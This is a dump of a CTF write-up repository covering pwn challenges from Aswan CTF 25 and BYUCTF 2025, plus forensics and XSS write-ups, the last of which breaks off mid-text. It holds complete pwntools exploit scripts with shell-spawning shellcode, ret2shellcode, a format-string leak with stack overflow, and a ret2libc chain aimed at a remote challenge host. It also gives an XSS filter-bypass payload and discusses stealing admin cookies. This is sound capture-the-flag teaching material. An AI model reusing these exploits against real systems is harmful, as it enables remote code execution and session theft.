https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Lucky/Lucky_Player.zip
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/Readme.md:
--------------------------------------------------------------------------------
1 | ### Brief
2 |
3 | This challenge involves exploiting a simple binary to gain shell access. The application generates a "lucky number" using `rand() % 1000`, seeded with `srand(time(0))` — a seed anyone with a clock can reproduce, so the "guess" is deterministic. If the user guesses the number correctly, the program calls a function named `gift()`. This function reads user input with the unbounded `gets()` function, leading to a stack buffer overflow (BOF).
4 |
5 | Key details:
6 | - **PIE** is disabled.
7 | - The stack is executable.
8 | - No memory leak is provided for user input.
9 |
10 | This setup makes it a classic **ret2shellcode** challenge.
11 |
12 | ---
13 |
14 | ### Solution Approaches
15 |
16 | #### 1. **Retrieve the lucky number**
17 |
18 | To predict the lucky number:
19 | - Use `ctypes.CDLL('./libc.so.6')` to load the same libc version as the challenge binary, so `rand()` produces the same sequence as the server.
20 | - Take the current Unix timestamp and pass it to `srand()`. (If the guess is rejected, the two clocks probably differ by a second — retry with the seed ±1.)
21 | - Compute `rand() % 1000` to obtain the lucky number.
22 | - Send the lucky number to the application to reach the `gift()` function.
23 |
24 | #### 2. **Find a gadget to execute the shellcode**
25 |
26 | Inside the `gift()` function:
27 | - Set a breakpoint after the `gets()` call and observe that `gets()` returns the buffer pointer in `RAX`; verify in the debugger that nothing clobbers `RAX` between that call and the function's `ret`, so at the moment of return `RAX` still points at the user input.
28 | - Use a tool like `ropper` to locate a `jmp rax` gadget in the binary (PIE is off, so its address is fixed). Returning into this gadget jumps straight to the shellcode at the start of the buffer.
29 |
30 | ---
31 |
32 | ### Final Exploit Steps
33 |
34 | 1. Load the same libc version as the challenge binary.
35 | 2. Use the current timestamp to seed `rand()` and calculate the lucky number.
36 | 3. Send the lucky number to the application.
37 | 4. Craft your payload:
38 | - Place your shellcode.
39 | - Pad with `"A"` characters so that shellcode plus padding total 72 bytes (the distance from the buffer to the saved return address — confirm the offset in the debugger).
40 | - Append the address of the `jmp rax` gadget.
41 | 5. Execute the payload to gain a shell.
42 |
43 | [Here is the exploit script](./solve.py)
44 |
45 | This script automates the above steps to exploit the vulnerability and achieve shell access.
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/challenge/Dockerfile:
--------------------------------------------------------------------------------
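FROM kalilinux/kali-rolling

# Unprivileged service account. No -m: the home directory is created by
# WORKDIR below and stays root-owned, so the process cannot write there.
RUN useradd -d /home/ctf/ -s /bin/bash ctf

WORKDIR /home/ctf/

# Challenge artefacts: the binary, the exact libc/loader it was linked
# against, the flag, and the ynetd listener that forks the binary per client.
COPY ./src/lucky .
COPY ./src/flag .
COPY ./src/libc.so.6 .
COPY ./src/ld-linux-x86-64.so.2 .
COPY ynetd .

# Everything root-owned and read-only for 'ctf': executables 555, flag 444
# (the intended solve is a shell that reads the flag, so it must stay
# readable). One layer instead of six, and no bare `apt-get update` baking
# stale package lists into the image when nothing is installed.
RUN chown -R root:root . \
 && chmod 555 lucky libc.so.6 ld-linux-x86-64.so.2 ynetd \
 && chmod 444 ./flag

USER ctf
EXPOSE 8083
CMD ["./ynetd", "-p", "8083", "./lucky"]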
27 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/flag:
--------------------------------------------------------------------------------
1 | YAO{Dummy}
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/ld-linux-x86-64.so.2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/ld-linux-x86-64.so.2
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/libc.so.6
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/lucky:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Lucky/challenge/src/lucky
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/challenge/ynetd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Finals/Pwn/Lucky/challenge/ynetd
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/docker-compose.yml:
--------------------------------------------------------------------------------
# Compose service for the Lucky pwn challenge; the image is built from ./challenge/Dockerfile
version: '3.8'

services:
  lucky:
    build:
      context: ./challenge
    ports:
      # host 8084 -> container 8083 (the port ynetd listens on in the Dockerfile)
      - "8084:8083"
    # restart the listener automatically (e.g. after a crash) unless it was stopped explicitly
    restart: unless-stopped
--------------------------------------------------------------------------------
/Aswan CTF 25/Finals/Pwn/Lucky/solve.py:
--------------------------------------------------------------------------------
from pwn import *
import ctypes
import time

context.log_level = 'debug'

# Load the same libc used by the binary, so that ctypes' srand()/rand() produce the
# exact sequence the target computes (the PRNG is libc-implementation specific)
libc = ctypes.CDLL('./challenge/src/libc.so.6')

# Calculate the current lucky number.
# The target seeds rand() with the wall-clock second (see the readme), so the
# "secret" is predictable by anyone who knows the libc and the approximate time;
# the only failure mode is crossing a second boundary between this call and the
# server's srand(). Seeding from a CSPRNG instead of time() is what removes this bug.
current_time = int(time.time())
libc.srand(current_time)
predicted_number = libc.rand() % 1000

log.info(f"Predicted lucky number: {predicted_number}")

# Start the process (local by default; the commented-out line targets the port
# published by docker-compose.yml)
p = process('./challenge/src/lucky')
# p = remote("127.0.0.1", 8084)

p.recv()
p.sendline(str(predicted_number).encode())

# 22-byte shell-spawning shellcode (the "/bin//sh" string is visible in bytes 6-13).
# NOTE(review): this is a str, not bytes; pwntools has to guess an encoding when
# flat() packs it (it warns "Text is not bytes"); a b"..." literal would be exact.
shellcode = "\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05"


# Frame layout: the shellcode sits at the start of the gets() buffer, padding fills
# the 72 bytes up to the saved return address, and the return address becomes a
# `jmp rax` gadget; RAX still holds gets()' return value, i.e. the buffer pointer,
# so no stack-address leak is needed. The gadget address is absolute, so the binary
# is presumably non-PIE; the technique also requires an executable stack (no NX).
payload = flat(
shellcode,
'A' * (72 - len(shellcode)), # Padding to reach the return address
p64(0x000000000040110c) # Address of the jmp rax instruction that will jmp to the shellcode
)

p.sendline(payload)
p.interactive()
35 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/Dockerfile:
--------------------------------------------------------------------------------
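FROM kalilinux/kali-rolling

# Create an unprivileged CTF user; the service drops to this account (USER below)
RUN useradd -d /home/ctf/ -s /bin/bash ctf

# Refresh the package index and discard it again in the same layer: nothing is
# installed in this image, so keeping /var/lib/apt/lists only bloats the layer.
RUN apt-get update && rm -rf /var/lib/apt/lists/*

WORKDIR /home/ctf/

# Copy the challenge binary, the exact loader/libc it was handed out with (so the
# players' offsets match the server), the flag and the ynetd forking listener
COPY ./src/Elbareed_Elmasry .
COPY ./src/flag .
COPY ./src/libc.so.6 .
COPY ./src/ld-linux-x86-64.so.2 .
COPY ynetd .

# Set permissions in a single layer. Everything is owned by root, so the ctf
# user (and therefore any shell obtained through the binary) can execute but not
# modify the binary, the libraries or the listener; the working directory is not
# writable by ctf either. The flag is read-only and intentionally readable by the
# exploited process.
RUN chown -R root:root . \
 && chmod 555 Elbareed_Elmasry libc.so.6 ld-linux-x86-64.so.2 ynetd \
 && chmod 444 ./flag

USER ctf
# ynetd listens on 8083 inside the container
EXPOSE 8083
CMD ["./ynetd", "-p", "8083", "./Elbareed_Elmasry"]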
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/Elbareed_Elmasry_Player.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/Elbareed_Elmasry_Player.zip
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/Readme.md:
--------------------------------------------------------------------------------
1 | ### Brief
2 |
3 | This is an easy Pwn challenge where the application has some basic features (Register, Login, View Profile and Send Letter).
4 | PIE is enabled but the stack is executable.
5 | There is a format string bug in the view-profile function, so the user can leak an address from the stack, calculate the offset between it and the shellcode, and then return to the shellcode using the buffer-overflow bug in send letter.
6 |
7 |
8 |
9 |
10 | ### Solution Approaches
11 |
12 |
13 | 1. **Leaking the address from the stack**
14 |
15 | Register a user with the username `%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p` to leak some addresses from the stack; index 6 turns out to be the `$rsp` value, i.e. the stack pointer (top of the stack).
16 |
17 |
18 | 2. **Get the shellcode address offset from the leaked address**
19 |
20 | After setting a breakpoint in the `send_letter` function we can determine the address of our input as returned by `gets`.
21 | Then we calculate the offset between our input address (the shellcode) and the leaked address: leaked address - shellcode address (the top of the stack) = 0x120.
22 |
23 | ---
24 |
25 | ### Final Exploit
26 |
27 |
28 | 1. Register and log in with the username `"%6$p"`.
29 | 2. Go to show_profile, read the leaked address, then subtract 0x120 from it.
30 | 3. Put the shellcode first, then pad the rest of the buffer with `"A" * (264 - len(shellcode))` to control RIP.
31 | 4. Append the address of the shellcode.
32 | 5. Get a shell.
33 |
34 | [Here is the exploit script](./solve.py)
35 |
36 | This script automates the steps described above to exploit the vulnerability and gain a shell.
37 |
38 | 
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/solve.py:
--------------------------------------------------------------------------------
1 |
2 |
from pwn import *


context.log_level = 'debug'
# asm() below needs the architecture to be set
context.arch = 'amd64'
# NOTE(review): the repo ships src/Elbareed_Elmasry (capitalised); on a case-sensitive
# filesystem this lower-case path will not resolve for process() / ELF() below
BINARY = "./src/elbareed_elmasry"

# LOCAL=1 on the command line runs the binary directly, otherwise connect to a
# locally exposed service (port 3400 does not match the Dockerfile's 8083, so it is
# presumably a host-side port mapping -- verify before running)
if args.LOCAL:
    r = process(BINARY)
else:
    #r = process(BINARY)
    r = remote("localhost", 3400)

e = ELF(BINARY)
# pwntools-generated amd64 shell-spawning shellcode; its length decides the padding later
shell_code = asm(shellcraft.amd64.sh())

# ret = ROP(e).find_gadget(['ret'])[0]

# Breakpoint script for the optional gdb.attach() call (currently commented out)
gdb_script = """
b *send_letter+75
"""
24 |
def register() -> None:
    """Menu option 1: register a user whose username is the format-string probe.

    "%6$p" is stored as the username; show_profile later echoes it through a
    format-string sink (per the readme), so the 6th vararg slot -- a stack
    pointer -- gets printed back. Uses the module-level connection ``r``.
    """
    print("[*] Registering...")
    r.sendline("1")
    print("[*] Sending username...")
    print(r.recv().decode())
    # str rather than bytes: pwntools encodes it (with a "Text is not bytes" warning)
    r.sendline("%6$p")
    # print(r.recv().decode())
32 |
def login() -> None:
    """Menu option 2: log in as the user created by register() (same "%6$p" name).

    Waits for the username prompt before answering; uses the module-level
    connection ``r``.
    """
    print("[*] Logging in...")
    r.sendline("2")
    r.recvuntil(b"Enter username to login:")
    r.sendline("%6$p")
    # print(r.recv().decode())
39 |
def get_leak():
    """Menu option 3 (show profile): read the format-string output and derive
    the address the shellcode will occupy.

    The profile echoes the "%6$p" username as a hex pointer after
    "Username: "; the shellcode buffer sits 0x120 bytes below that pointer
    (offset measured in gdb, see the readme). Uses the module-level
    connection ``r``.
    """
    print("[*] Getting leak...")
    r.sendline("3")
    profile = r.recv()
    print("Profile: ", profile)
    # The leaked pointer runs from just after "Username: " to the end of that line
    leaked_hex = profile.decode().split("Username: ")[1].split("\n")[0]
    stack_leak = int(leaked_hex, 16)
    return stack_leak - 0x120
48 |
49 |
50 |
try:
    # gdb.attach(r,gdb_script)
    # Consume the menu banner up to the prompt before driving the menu
    output = r.recvuntil(b"Exit\n>")
    print(output.decode())
    register()
    print(r.recv().decode())
    login()
    print(r.recv().decode())
    # Absolute address the shellcode will have inside send_letter's buffer
    leaked_address = get_leak()
    # Menu option 4: send letter (the gets()-based overflow, per the readme)
    r.sendline("4")
    print(r.recv().decode())

    # Frame layout: shellcode at the buffer start, padding to 256 bytes, 8 bytes
    # over the saved RBP ('B'*8), then the return address pointing back into the
    # buffer. Needs an executable stack; the leak defeats PIE/ASLR of the stack.
    payload = flat(shell_code, 'A' * (256 - len(shell_code)), 'B'*8, p64(leaked_address))
    r.sendline(payload)
    r.interactive()

# NOTE(review): `e` here rebinds the module-level ELF object of the same name
except Exception as e:
    print(f"[-] Error: {str(e)}")

finally:
    r.close()
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/.gdb_history:
--------------------------------------------------------------------------------
1 | disass show_profile
2 | b *show_profile + 57
3 | r
4 | c
5 | ni
6 | b *show_profile + 102
7 | r
8 | stack
9 | c
10 | stack
11 | c
12 | c
13 | c
14 | stack
15 | stack
16 | search "AAAABBBB"
17 | c
18 | b *show_profile + 102
19 | r
20 | stack
21 | search AAAABBBB
22 | search 0x5555555592f0
23 | search 5555555592f0
24 | b *send_letter
25 | c
26 | ni 5
27 | ni
28 | search CCCC
29 | stack
30 | c
31 | stack
32 | 0x7fffffffdbd0 - 0x7fffffffdcd0
33 | p0x7fffffffdbd0 - 0x7fffffffdcd0
34 | p 0x7fffffffdbd0 - 0x7fffffffdcd0
35 | p 0x7fffffffdbd0 - 0x7fffffffdcd0
36 | p 0x120
37 | c
38 | stack
39 | b *send_letter
40 | b *show_profile + 102
41 | r
42 | stack
43 | c
44 | r
45 | b *show_profile + 102
46 | c
47 | stack
48 | c
49 | b *send_letter
50 | c
51 | ni
52 | stack
53 | vmmap 0x7fffffffdcf0
54 | x/s 0x7fffffffdcf0
55 | p 0x7fffffffdbd0 - 0x7fffffffdcf0
56 | p 0x7fffffffdcf0 - 0x7fffffffdbd0
57 | p/x 0x7fffffffdcf0 - 0x7fffffffdbd0
58 | checksec
59 | x/s 0x7fffffffdcf0
60 | x/s 0x7fffffffdbd0
61 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/Elbareed_Elmasry:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/Elbareed_Elmasry
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/flag:
--------------------------------------------------------------------------------
1 | FLAG{DUMMY}
2 |
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/ld-linux-x86-64.so.2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/ld-linux-x86-64.so.2
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/src/libc.so.6
--------------------------------------------------------------------------------
/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/ynetd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/Aswan CTF 25/Quals/Pwn/Elbareed Elmasry/ynetd
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/.gdb_history:
--------------------------------------------------------------------------------
1 | c
2 | ni
3 | ni
4 | stack 30
5 | c
6 | ni
7 | ni
8 | c
9 | c
10 | c
11 | c
12 | c
13 | ni
14 | ni
15 | ni
16 | vmmap 0x7ffe54f412e3
17 | c
18 | ni
19 | ni
20 | stack 30
21 | p 0x7ffe968e1a48 - 0x7ffe968e19a0
22 | p 168 / 8
23 | c
24 | p 0x7fced9814206 - 133
25 | p/x 0x7fced9814206 + 133
26 | vmmap 0x7fced981428b
27 | p 0x7fced981428b - 0x7fced97ea000
28 | p/x 0x7fced981428b - 0x7fced97ea000
29 | c
30 | c
31 |
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/chall.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/BYUCTF 2025/pwn/Game of Yap/chall.zip
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/game-of-yap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/BYUCTF 2025/pwn/Game of Yap/game-of-yap
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/game-of-yap_patched:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/BYUCTF 2025/pwn/Game of Yap/game-of-yap_patched
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/ld-2.39.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/BYUCTF 2025/pwn/Game of Yap/ld-2.39.so
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/abdoghazy2015/CTF-Write-Ups/ce9d9753cdbf979ed217bbe596182132ba05ba4f/BYUCTF 2025/pwn/Game of Yap/libc.so.6
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/readme.md:
--------------------------------------------------------------------------------
1 | ## Game of Yap - Pwn Challenge Solver
2 |
3 | **Important Note:** The `libc.so.6` version required for this challenge was not included in the provided challenge files (`chall.zip`). Initially, the exploit worked locally but failed to work remotely. To resolve this, I built a Docker container, extracted the correct `libc` binary from it, patched the binary accordingly, and recalculated the `libc` base address.
--------------------------------------------------------------------------------
/BYUCTF 2025/pwn/Game of Yap/solve.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
from pwn import *

# Binary patched to use the libc/loader extracted from the challenge container (see readme)
exe = ELF("./game-of-yap_patched")
libc = ELF("./libc.so.6")
# NOTE(review): `ld` is never used below; kept for reference to the matching loader
ld = ELF("./ld-2.39.so")

# Derive arch/os/bits for asm(), ROP() and packing from the target ELF
context.binary = exe
10 |
11 |
def conn():
    """Open the target and return the tube.

    With LOCAL on the command line the patched binary is spawned as a local
    process (and gdb is attached when DEBUG is also set); otherwise a socket to
    the remote challenge service is returned.
    """
    if not args.LOCAL:
        return remote("yap.chal.cyberjousting.com", 1355)
    io = process([exe.path])
    if args.DEBUG:
        gdb.attach(io)
    return io
21 |
# Offsets inside the PIE binary; added to exe.address once the base is known (see main)
mov_rsi_into_rdi = 0x0000000000001243
printf_gadget = 0x1299
24 |
def main():
    """Three-stage exploit: partial-overwrite to a leak function, format-string
    leak of a libc pointer, then a ret2libc chain calling system("/bin/sh").

    Each stage overflows the same 264-byte frame of play(); the chain relies on
    the gadget offsets above and on the libc offset measured in gdb (see
    .gdb_history). The protocol is strictly sequential, so the send/recv order
    below must not change.
    """
    r = conn()
    # gdb.attach(r,"""
    # b *play + 42
    # c
    # """)
    r.recvuntil("...\n")

    # Stage 1: overwrite only the low byte of the saved return address. Under PIE
    # the high bytes already hold the binary's base, so changing the last byte
    # redirects execution to the yap function without knowing the base. "\x80" is
    # a str here; pwntools packs it into the single byte 0x80.
    payload1 = flat(
        "A" * 264,
        "\x80"
    )
    r.send(payload1)

    # yap prints the address of play, which gives the binary's base address
    play_leak = r.recvline().strip().decode()
    play_leak = int(play_leak, 16)
    exe.address = play_leak - exe.symbols['play']
    log.info(f"Base address : {hex(exe.address)}")

    ret_gadget = ROP(exe).find_gadget(["ret"])[0]


    # Stage 2: the buffer starts with a format string; a gadget copies RSI into
    # RDI (the author's note says RSI still refers to the input -- not verifiable
    # here) and a printf gadget then prints stack slot 27, a libc pointer. Control
    # returns to play so a third payload can be sent.
    payload2 = flat(
        "B%27$p", # RSI value (index of the libc-related address on the stack)
        "B" * (264 - 6), # Padding
        p64(exe.address + mov_rsi_into_rdi), # Gadget that will copy rsi into rdi
        p64(ret_gadget), # Stack alignment
        p64(exe.address + printf_gadget), # Call printf gadget
        p64(exe.symbols['play']), # RBP
        p64(exe.symbols['play']) # Return address to play function to send the libc payload
    )
    r.send(payload2)

    # Parse the leaked pointer (printed between the leading "B" and the "BB" padding)
    # and compute the libc base from the 0x2a28b offset measured in gdb; the log line
    # subtracts 139 (0x8b) from the leak, presumably to show the containing function.
    libc_start_main_leak = r.recvuntil("BB").decode()
    libc_start_main_leak = libc_start_main_leak.strip().split("B")[1].split("BB")[0]
    log.info(f" libc start_main : {hex(int(libc_start_main_leak,16) - 139 )}")
    libc.address = int(libc_start_main_leak, 16) - 0x2a28b
    log.info(f"libc base : {hex(libc.address)}")

    # Stage 3: classic ret2libc. The pop gadgets come from libc; their names
    # encode the extra registers each one pops (filled with dummy values below).
    libc_ROP = ROP(libc)
    bin_sh = next(libc.search("/bin/sh\0"))
    pop_rdi_rbp = libc_ROP.find_gadget(["pop rdi"])[0]
    pop_rsi_rbx = libc_ROP.find_gadget(["pop rsi"])[0]
    pop_rdx = libc_ROP.find_gadget(["pop rdx"])[0]

    payload3 = flat(
        "A" * 264,
        p64(pop_rdi_rbp),
        p64(bin_sh), # RDI value (first argument to system) -> address of /bin/sh
        p64(0), # RBP value -> any (Just a gadget side effect)
        p64(pop_rsi_rbx),
        p64(0), # RSI value (second argument to system) -> 0
        "B"*8, # RBX value -> any (Just a gadget side effect)
        p64(pop_rdx),
        p64(0), # RDX value (third argument to system) -> 0
        p64(libc.symbols["system"])

    )
    r.send(payload3)


    # good luck pwning :)
    r.interactive()
92 |
93 |
# Run the exploit only when executed as a script, not when imported
if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------
/CAT CTF23/Forensics/Revenge I/Readme.md:
--------------------------------------------------------------------------------
1 | # Hello everyone, this is my writeup for my Ez DFIR challenge " Revenge I " in CAT CTF 23
2 |
3 | 
4 |
5 |
6 | ### Since our target is to get some info (attacker_name & group name) so, let's analyze this xlsx file !
7 |
8 | ### After opening the file we see one column holding the names of some companies, which seem to be the targets of this group!
9 |
10 | ### Since the description says no OSINT is required, let's unzip the xlsx file to analyze it.
11 |
12 | ### To get the attacker's username we need to find out which user created the document, by reading this file:
13 |
14 | 
15 |
16 | ### So, our attacker is `Th3-0b3l1sk` #Answer 1
17 |
18 | ### After that we can get the group name from the path the document was saved to when it was created, by reading this file:
19 |
20 | 
21 |
22 | ### Our flag : CATF{Th3-0b3l1sk_n!NjaTur7l5}
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/CAT CTF23/Web/Xss 3/readme.md:
--------------------------------------------------------------------------------
1 | # Hello everyone, this is my writeup for my web challenge " Xss 3 " that had no solves in JIS CTF 2023 and CAT CTF 23
2 |
3 | 
4 |
5 | ### When we open the link we find "Enter your name", and after sending it as `/?name=ghazy` we get this:
6 |
7 | 
8 |
9 | ### Since we can clearly see our input reflected in the page, let's try a basic payload like
10 | ``
11 |
12 | ### And we get our input back as-is
13 |
14 | 
15 |
16 | ### Seems filtered, right? So let's open the HTML source to see what happened to our payload in the reflection
17 |
18 | 
19 |
20 | ### If you try to trigger an error by sending the `name` parameter as an array, you get this error
21 |
22 | 
23 |
24 | ### So it's clear now why our payload is filtered: our input is being passed to the PHP `htmlspecialchars` function
25 |
26 | > This function encodes the HTML special chars [<, >, ', ", &] in its default configuration.
27 |
28 | ### So, this function is safe from bypassing !
29 |
30 | ### But after some hours, since no one had solved it, I released a hint.
31 |
32 | 
33 |
34 | ### As we see in the response, our input is being reflected into a JS variable!
35 | ### So let's see how we can use that to bypass htmlspecialchars
36 |
37 | ### If you open your browser console and try this:
38 |
39 | 
40 |
41 | ### As you can see, we can write a string with hex escapes in JS, like in any other programming/scripting language!
42 |
43 | ### And since our input is reflected into the JS variable and the JS code prints it in the page, it should work!
44 |
45 | 
46 |
47 |
48 | ### let's try to test it in our challenge
49 |
50 | 
51 |
52 | 
53 |
54 | ### As you can see both of them are filtered !!
55 |
56 | ### Seems like the developer read about them in the docs and filtered them, and that's what makes it a real-life case :)
57 |
58 | 
59 |
60 |
61 | ### Then what about using an old escape syntax that has been deprecated in the JS docs :D
62 |
63 | ### Yup, it's called octal escaping.
64 |
65 | > We can escape octals in strings by just using `\`
66 |
67 | 
68 |
69 |
70 | ### TBH, I found it while I was debugging my challenge; I didn't know about it before :D
71 |
72 | ### I wrote a simple for loop to print all chars to figure out what this escaping was, and after that I realised it's octal :)
73 |
74 | ### So let's try to escape our HTML special chars [<, >] this way
75 |
76 | > Our Payload : \74img src=x onerror=alert()\76
77 |
78 | ### And bingoooo, we got our xss !
79 |
80 | 
81 |
82 |
83 | ### But the problem is that we only have 38 chars as a length limit! So we can't write a payload like this to steal the admin cookies:
84 |
85 | ```javascript
86 |
87 |
88 | ```
89 |
90 | ### It's more than 38 chars for sure !
91 |
92 | ### There are many ways to bypass the length limit, like `window.open` or the `13.rs` domain :D
93 |
94 | ### We will use window.open
95 |
96 | > In JS we can open a new window and control some of its properties, like its name!
97 |
98 | ### What about trying to eval our `window.name`, which we control?
99 |
100 | ### Like this
101 |
102 | 
103 |
104 |
105 | ### Since our payload length passed 40 chars, it will not work either :(
106 |
107 | ### So we need to do it in a smarter way :D, like eval without using eval
108 |
109 | ### If you search for tiny XSS payloads you will see this
110 |
111 | 
112 |
113 | `